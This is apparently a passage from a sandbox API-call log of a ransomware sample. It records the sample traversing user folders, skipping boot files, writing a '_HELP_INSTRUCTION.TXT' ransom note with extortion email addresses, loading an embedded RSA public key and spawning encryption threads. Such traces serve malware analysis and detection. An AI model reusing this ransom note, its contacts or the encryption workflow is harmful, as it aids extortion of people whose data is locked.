RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7e8) returned 0x0 [0139.784] RegQueryValueExW (in: hKey=0x7e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d023f8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d023f8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.785] RegCloseKey (hKey=0x7e8) returned 0x0 [0139.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.785] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.785] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.785] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\my documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.786] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.787] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.787] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.787] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0139.787] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0139.787] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.787] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.787] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0139.787] SetErrorMode (uMode=0x1) returned 0x1 [0139.787] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0139.787] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0139.787] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\NetHood\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0139.787] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\NetHood\\*.*") returned="C:\\Users\\Default\\NetHood\\*.*" [0139.787] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.787] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.787] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0139.787] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\NetHood\\*.*") returned="C:\\Users\\Default\\NetHood\\*.*" [0139.787] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="Desktop") returned 0x0 [0139.787] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="DESKTOP") returned 0x0 [0139.787] SetErrorMode (uMode=0x1) returned 0x1 [0139.787] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\NetHood\\_HELP_INSTRUCTION.TXT") returned 46 [0139.787] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.787] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.787] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7e8) returned 0x0 [0139.788] RegQueryValueExW (in: hKey=0x7e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d02628, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d02628*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.788] RegCloseKey (hKey=0x7e8) returned 0x0 [0139.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.788] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.788] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.788] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.790] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.790] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.790] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.791] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.791] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0139.791] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0139.791] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.791] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.791] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0139.791] SetErrorMode (uMode=0x1) returned 0x1 [0139.791] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0139.791] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0139.791] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0139.791] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Pictures\\*.*") returned="C:\\Users\\Default\\Pictures\\*.*" [0139.791] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.791] PathFindFileNameW (pszPath="C:\\Users\\Default\\Pictures") returned="Pictures" [0139.791] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0139.791] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.791] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.791] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0139.791] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0139.791] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.791] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0139.791] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0139.791] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0139.791] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0139.791] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="Desktop") returned 0x0 [0139.791] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0139.791] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Pictures\\") returned 30 [0139.791] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.791] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.791] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\") returned="\\\\?\\C:\\Users\\Default\\Pictures\\" [0139.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ec [0139.792] Sleep (dwMilliseconds=0x96) [0139.937] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.937] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.938] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.938] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0139.938] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Pictures\\*.*") returned="C:\\Users\\Default\\Pictures\\*.*" [0139.938] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="Desktop") returned 0x0 [0139.938] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0139.938] SetErrorMode (uMode=0x1) returned 0x1 [0139.938] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Pictures\\_HELP_INSTRUCTION.TXT") returned 47 [0139.938] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.938] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.939] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7f0) returned 0x0 [0139.939] RegQueryValueExW (in: hKey=0x7f0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d02858, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d02858*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.939] RegCloseKey (hKey=0x7f0) returned 0x0 [0139.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.939] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.939] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.939] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.939] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.939] PathFindFileNameW (pszPath="C:\\Users\\Default\\Pictures") returned="Pictures" [0139.939] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0139.939] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0139.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.940] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.940] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.940] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.940] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.940] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.940] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.940] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0139.940] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0139.940] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.940] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.940] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0139.940] SetErrorMode (uMode=0x1) returned 0x1 [0139.940] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0139.940] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0139.940] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\PrintHood\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0139.940] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*.*") returned="C:\\Users\\Default\\PrintHood\\*.*" [0139.940] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.940] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.940] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0139.940] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*.*") returned="C:\\Users\\Default\\PrintHood\\*.*" [0139.940] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="Desktop") returned 0x0 [0139.940] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="DESKTOP") returned 0x0 [0139.941] SetErrorMode (uMode=0x1) returned 0x1 [0139.941] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\PrintHood\\_HELP_INSTRUCTION.TXT") returned 48 [0139.941] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.941] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.941] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7f4) returned 0x0 [0139.941] RegQueryValueExW (in: hKey=0x7f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d02a88, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d02a88*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.941] RegCloseKey (hKey=0x7f4) returned 0x0 [0139.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.941] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.941] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.942] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.944] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.944] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.944] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.944] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0139.944] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0139.944] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.944] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.944] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0139.944] SetErrorMode (uMode=0x1) returned 0x1 [0139.944] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0139.944] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0139.944] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Recent\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0139.944] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Recent\\*.*") returned="C:\\Users\\Default\\Recent\\*.*" [0139.944] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.944] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.944] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0139.944] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Recent\\*.*") returned="C:\\Users\\Default\\Recent\\*.*" [0139.944] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="Desktop") returned 0x0 [0139.944] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="DESKTOP") returned 0x0 [0139.944] SetErrorMode (uMode=0x1) returned 0x1 [0139.945] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: 